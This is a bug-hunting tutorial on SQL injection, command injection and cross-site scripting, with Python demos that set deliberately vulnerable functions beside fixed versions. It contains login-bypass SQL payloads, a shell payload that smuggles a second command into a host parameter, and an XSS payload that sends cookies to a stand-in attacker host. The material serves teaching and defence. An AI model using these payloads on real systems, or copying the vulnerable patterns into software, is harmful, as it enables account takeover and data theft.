
Bug Hunting 101: Parameter Injection Vulnerabilities

Graham Zemel
4 min read · Jan 11, 2023


TL;DR: A short guide to finding parameter injection vulnerabilities, with tips on how to exploit and mitigate them.

Introduction

Parameter injection vulnerabilities are security flaws that occur when an attacker can control a parameter a web application consumes (a query-string value, form field, header, cookie or path segment) and that value is interpreted by some downstream component (a SQL engine, a shell, a browser) as syntax rather than as plain data. The attacker can then read sensitive data or make the application behave in ways its developers never intended.

These vulnerabilities are particularly dangerous because they can let an attacker sidestep authentication and authorization checks, leak sensitive information, or perform actions in the application on behalf of other users.

Types of Parameter Injection

SQLi (SQL Injection) →
One common form of parameter injection vulnerability is SQL injection. This occurs when user-supplied input is concatenated into a SQL query string, so that characters in the input (a closing quote, a comment marker, an extra OR clause) are parsed by the database as part of the query rather than as a value.

An attacker might exploit a SQL injection vulnerability to add extra conditions to a query, returning rows they would normally need elevated permissions to see, or to comment out a password check entirely and log in as another user.
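The following is an added example, not code from the original article: a login query built by string formatting next to the same query using a bound parameter, run against an in-memory SQLite table whose rows (and plaintext passwords, which are only there to keep the demo short) are constructed here. The two payloads are the classic comment-out and always-true tricks the paragraph above describes.

```python
# Added example (not from the original article): SQL injection through the
# username/password parameters of a login form. The users table, its rows and
# the login_* helpers are all constructed for this demo.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway database with a few constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "alice", "alice-pw", "admin"),
            (2, "bob", "bob-pw", "user"),
            (3, "carol", "carol-pw", "user"),
        ],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Interpolates both parameters into the SQL text: input becomes syntax."""
    query = (
        "SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Binds both parameters: the driver never lets them be parsed as SQL."""
    query = (
        "SELECT id, username, role FROM users "
        "WHERE username = ? AND password = ?"
    )
    return conn.execute(query, (username, password)).fetchall()


# Payload 1: close the string literal and comment out the password check.
#   WHERE username = 'alice'--' AND password = 'anything'
COMMENT_OUT = "alice'--"

# Payload 2: an always-true condition in both fields returns every row.
#   WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'
ALWAYS_TRUE = "' OR '1'='1"


def demo() -> dict:
    """Compare what each version returns for the two payloads."""
    conn = make_db()
    return {
        "comment_out_vulnerable": login_vulnerable(conn, COMMENT_OUT, "anything"),
        "comment_out_safe": login_safe(conn, COMMENT_OUT, "anything"),
        "always_true_vulnerable": login_vulnerable(conn, ALWAYS_TRUE, ALWAYS_TRUE),
        "always_true_safe": login_safe(conn, ALWAYS_TRUE, ALWAYS_TRUE),
        "legit_safe": login_safe(conn, "alice", "alice-pw"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The fix is not "strip quotes from the input"; it is to keep data and query text separate with a parameterized query (or an ORM that does the same underneath). The safe version still logs alice in with the real password, so functionality is unchanged.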

Command Injection →
Another form of parameter injection vulnerability is command injection. This occurs when a web application passes a parameter into an operating-system command (for example a hostname handed to ping, or a filename handed to a converter) and runs it through a shell, so that shell metacharacters in the parameter such as ;, |, && or $( ) start a second, attacker-chosen command. An attacker might use this to run arbitrary commands as the web server's user, read files on the host, or download and execute further malicious code on the server.
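An added example, not from the original article, of command injection through a "host" parameter. A harmless `echo` stands in for the real command so it is safe to run; the hostname allowlist regex and the three `ping_*` helpers are assumptions made for this demo.

```python
# Added example (not from the original article): OS command injection via a
# "host" parameter. `echo` stands in for the real command (e.g. ping) so the
# demo is harmless; the hostname pattern below is an assumed allowlist.
import re
import shlex
import subprocess

# Assumed allowlist: letters, digits, dots and hyphens only.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")

# Constructed attacker input: a valid-looking host followed by a second command.
PAYLOAD = "example.com; echo INJECTED"


def validate_host(host: str) -> bool:
    """Return True only for strings that look like a plain hostname."""
    return HOSTNAME_RE.fullmatch(host) is not None


def ping_vulnerable(host: str) -> str:
    """Interpolates the parameter into a command line that /bin/sh parses."""
    cmd = f"echo pinging {host}"  # 'example.com; echo INJECTED' becomes two commands
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_quoted(host: str) -> str:
    """Still uses a shell, but shlex.quote turns the whole value into one word."""
    cmd = f"echo pinging {shlex.quote(host)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_safe(host: str) -> str:
    """Validate first, then pass argv as a list: no shell ever sees the value."""
    if not validate_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return subprocess.run(
        ["echo", "pinging", host], capture_output=True, text=True
    ).stdout


if __name__ == "__main__":
    print(repr(ping_vulnerable(PAYLOAD)))  # second command runs
    print(repr(ping_quoted(PAYLOAD)))      # payload is echoed as one argument
    print(validate_host(PAYLOAD))          # False: safe version refuses it
    print(repr(ping_safe("example.com")))
```

The preferred fix is the last one: never invoke a shell at all, and reject anything that is not a well-formed hostname before it reaches the command. `shlex.quote` is the fallback when a shell is genuinely required, but it does nothing about arguments that the called program itself interprets (for example a value beginning with `-` being read as an option).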

Cross-Site Scripting (XSS) →
A third form of parameter injection vulnerability is Cross-Site Scripting (XSS). This occurs when an attacker-controlled parameter is written into an HTML page without being escaped for the context it lands in, so the victim's browser treats it as markup or script rather than text. The injected script runs in other users' browsers with that site's origin, so an attacker can use it to capture sensitive information from those users. If they capture credentials from…
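An added example, not from the original article: a search-results fragment that reflects a query parameter into a text node and into an attribute, rendered with no escaping, with entity escaping that ignores quotes, and with full escaping. The `render_*` helpers, the fragment layout and the two payloads are constructed for this demo; the point it adds to the paragraph is that escaping has to match the output context.

```python
# Added example (not from the original article): reflected XSS through a
# "q" parameter, escaped (or not) for two different HTML contexts.
import html

# Constructed payloads. The first targets a text node; the second breaks out
# of a double-quoted attribute value without using '<' at all.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(q: str) -> str:
    """No escaping: the parameter is emitted as raw HTML in both contexts."""
    return f'<p>Results for: {q}</p>\n<input name="q" value="{q}">'


def render_text_only_escaped(q: str) -> str:
    """Escapes < > & but not quotes: fine for the text node, not the attribute."""
    e = html.escape(q, quote=False)
    return f'<p>Results for: {e}</p>\n<input name="q" value="{e}">'


def render_safe(q: str) -> str:
    """Escapes < > & " ' so the value stays data in both contexts."""
    e = html.escape(q, quote=True)
    return f'<p>Results for: {e}</p>\n<input name="q" value="{e}">'


def attribute_breakout(rendered: str) -> bool:
    """Heuristic check: did the payload manage to open a new attribute?"""
    return 'autofocus onfocus="' in rendered and '&quot;' not in rendered


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD))
    print(render_text_only_escaped(ATTR_PAYLOAD))  # attribute breakout survives
    print(render_safe(ATTR_PAYLOAD))               # quotes become &quot;
```

Escaping on output, chosen for the exact context (HTML body, attribute, JavaScript string, URL), is the core fix; a Content-Security-Policy and HttpOnly cookies limit what a successful injection can steal, but they do not remove the bug.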


Written by Graham Zemel

Medium Boost Nominator 🚀 | Creator of thegrayarea.tech | Developer, Hacker, Writer | Website → grahamzemel.com
